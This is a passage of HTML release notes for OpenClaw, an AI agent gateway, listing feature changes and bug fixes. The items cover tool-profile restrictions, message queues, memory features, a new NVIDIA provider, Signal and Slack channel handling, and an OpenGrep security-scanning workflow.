<li>Security and operations add OpenGrep scanning, sharper GHSA triage policy, safer exec/pairing/owner-scope handling, Docker/onboarding automation, and web-fetch IPv6 ULA opt-in for trusted proxy stacks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinjimz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinjimz">@jinjimz</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Security/tools: configured tool sections (<code>tools.exec</code>, <code>tools.fs</code>) no longer implicitly widen restrictive profiles (<code>messaging</code>, <code>minimal</code>). Users who need those tools under a restricted profile must add explicit <code>alsoAllow</code> entries; a startup warning identifies affected configs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078726004" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47487/hovercard" href="https://github.com/openclaw/openclaw/issues/47487">#47487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Agents/commitments: add opt-in inferred follow-up commitments with hidden batched extraction, per-agent/per-channel scoping, heartbeat delivery, CLI management, a simple <code>commitments.enabled</code>/<code>commitments.maxPerDay</code> config, and heartbeat-interval due-time clamping so magical check-ins do not echo immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348684831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74189" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74189/hovercard" href="https://github.com/openclaw/openclaw/pull/74189">#74189</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vignesh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vignesh07">@vignesh07</a>.</li>
<li>Messages/queue: make <code>steer</code> drain all pending Pi steering messages at the next model boundary, keep legacy one-at-a-time steering as <code>queue</code>, and add a dedicated steering queue docs page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Messages/queue: default active-run queueing to <code>steer</code> with a 500ms followup fallback debounce, and document the queue modes, precedence, and drop policies on the command queue page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Messages: add global <code>messages.visibleReplies</code> so operators can require visible output to go through <code>message(action=send)</code> for any source chat, while <code>messages.groupChat.visibleReplies</code> stays available as the group/channel override. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
<li>Gateway/events: surface <code>spawnedBy</code> on subagent chat and agent broadcast payloads so clients can route child session events without an extra session lookup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226049569" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63244" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63244/hovercard" href="https://github.com/openclaw/openclaw/pull/63244">#63244</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Memory/wiki: add agent-facing people wiki metadata, canonical aliases, person cards, relationship graphs, privacy/provenance reports, evidence-kind drilldown, and search modes for person lookup, question routing, source evidence, and raw claims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: add optional per-conversation <code>allowedChatIds</code> and <code>deniedChatIds</code> filters so operators can enable recall only for selected direct, group, or channel conversations while keeping broad sessions skipped. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280170574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67977" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67977/hovercard" href="https://github.com/openclaw/openclaw/pull/67977">#67977</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quengh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quengh">@quengh</a>.</li>
<li>Active Memory: return bounded partial recall summaries when the hidden memory sub-agent times out, including the default temporary-transcript path, so useful recovered context is not discarded. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340395145" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73219" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73219/hovercard" href="https://github.com/openclaw/openclaw/pull/73219">#73219</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>.</li>
<li>Gateway/memory: add a read-only <code>doctor.memory.remHarness</code> RPC so operator clients can preview bounded REM dreaming output without running mutation paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263469272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66673/hovercard" href="https://github.com/openclaw/openclaw/pull/66673">#66673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Providers/NVIDIA: add the NVIDIA provider with API-key onboarding, setup docs, static catalog metadata, and literal model-ref picker support so NVIDIA hosted models can be selected with their provider prefix intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324848945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71204" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71204/hovercard" href="https://github.com/openclaw/openclaw/pull/71204">#71204</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Models: suppress explicitly configured openai-codex/gpt-5.4-mini inline entries so a stale models config written by <code>openclaw doctor --fix</code> cannot bypass the manifest capability block and cause repeated assistant-turn failures when the runtime switches to that model on ChatGPT-backed Codex accounts. Conditional suppressions (e.g. qwen Coding Plan endpoint guards) remain bypassable by explicit user configuration. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xCyda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xCyda">@0xCyda</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Added SQLite-backed plugin state store (<code>api.runtime.state.openKeyedStore</code>) for restart-safe keyed registries with TTL, eviction, and automatic plugin isolation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugin SDK: mark remaining legacy alias exports and diffs tool/config aliases with deprecation metadata, and add a guard so future legacy alias comments require <code>@deprecated</code> tags. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/QR/dependencies: internalize small terminal progress and QR wrapper helpers while keeping the real QR encoder dependency direct, reducing the default runtime dependency graph without changing QR output behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Dependencies: refresh workspace runtime, plugin, and tooling packages, including ACP, Pi, AWS SDK, TypeBox, pnpm, oxlint, oxfmt, jsdom, pdfjs, ciao, and tokenjuice, while keeping patched ACP behavior and lint gates current. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Gateway/dev: run <code>pnpm gateway:watch</code> through a named tmux session by default, with <code>gateway:watch:raw</code> and <code>OPENCLAW_GATEWAY_WATCH_TMUX=0</code> for foreground mode, so repeated starts respawn an inspectable watcher without trapping the invoking agent shell. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/diagnostics: emit an opt-in startup diagnostics timeline that records gateway lifecycle and plugin-load phases behind a config flag, so slow-start diagnosis no longer requires bespoke instrumentation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Control UI/i18n: extend the locale registry with new Persian (fa), Dutch (nl), Vietnamese (vi), Italian (it), Arabic (ar), and Thai (th) entries and ship <code>fa</code>, <code>nl</code>, <code>vi</code>, and <code>zh-TW</code> docs glossaries, so the docs translation pipeline and the Control UI language picker stay aligned across surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels: add Yuanbao channel docs entrance so the Tencent Yuanbao bot appears in the channel listing and sidebar navigation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341969080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73443" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73443/hovercard" href="https://github.com/openclaw/openclaw/pull/73443">#73443</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Channels/Yuanbao: update plugin GitHub location to YuanbaoTeam/yuanbao-openclaw-plugin and add "yuanbao" alias to channel catalog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349371764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74253" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74253/hovercard" href="https://github.com/openclaw/openclaw/pull/74253">#74253</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Docker setup: add <code>OPENCLAW_SKIP_ONBOARDING</code> so automated Docker installs can skip the interactive onboarding step while still applying gateway defaults. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148855578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55518" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55518/hovercard" href="https://github.com/openclaw/openclaw/pull/55518">#55518</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinjimz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinjimz">@jinjimz</a>.</li>
<li>Security policy: classify media/base64 decode and format-conversion overhead after configured acceptance limits as performance-only for GHSA triage unless a report demonstrates a limit bypass, crash, exhaustion, data exposure, or another boundary bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350238747" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74311" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74311/hovercard" href="https://github.com/openclaw/openclaw/pull/74311">#74311</a>)</li>
<li>Security/OpenGrep: add a precise OpenGrep rulepack, source-rule compiler, provenance metadata check, and PR/full scan workflows that validate first-party code and rulepack-only changes while uploading SARIF to GitHub Code Scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299142364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69483" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69483/hovercard" href="https://github.com/openclaw/openclaw/pull/69483">#69483</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keshavbotagent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keshavbotagent">@keshavbotagent</a>.</li>
<li>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kAIborg24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kAIborg24">@kAIborg24</a>.</li>
<li>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yhyatt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yhyatt">@yhyatt</a>.</li>
<li>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yelog/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yelog">@yelog</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gracker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gracker">@Gracker</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nhaener/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nhaener">@nhaener</a>.</li>
<li>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</li>
<li>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/civiltox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/civiltox">@civiltox</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solosage1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solosage1">@solosage1</a>.</li>
<li>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KoykL/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KoykL">@KoykL</a>.</li>
<li>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kane808-AI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kane808-AI">@Kane808-AI</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvisz8/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvisz8">@jarvisz8</a>.</li>
<li>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/minupla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/minupla">@minupla</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrewhong-translucent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrewhong-translucent">@andrewhong-translucent</a>.</li>
<li>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinduwang1001-max/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinduwang1001-max">@jinduwang1001-max</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heyhudson/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heyhudson">@heyhudson</a>.</li>
<li>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fgabelmannjr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fgabelmannjr">@fgabelmannjr</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/k7n4n5t3w4rt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/k7n4n5t3w4rt">@k7n4n5t3w4rt</a>.</li>
<li>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xCyda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xCyda">@0xCyda</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LLagoon3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LLagoon3">@LLagoon3</a>.</li>
<li>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaohuaxi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaohuaxi">@xiaohuaxi</a>.</li>
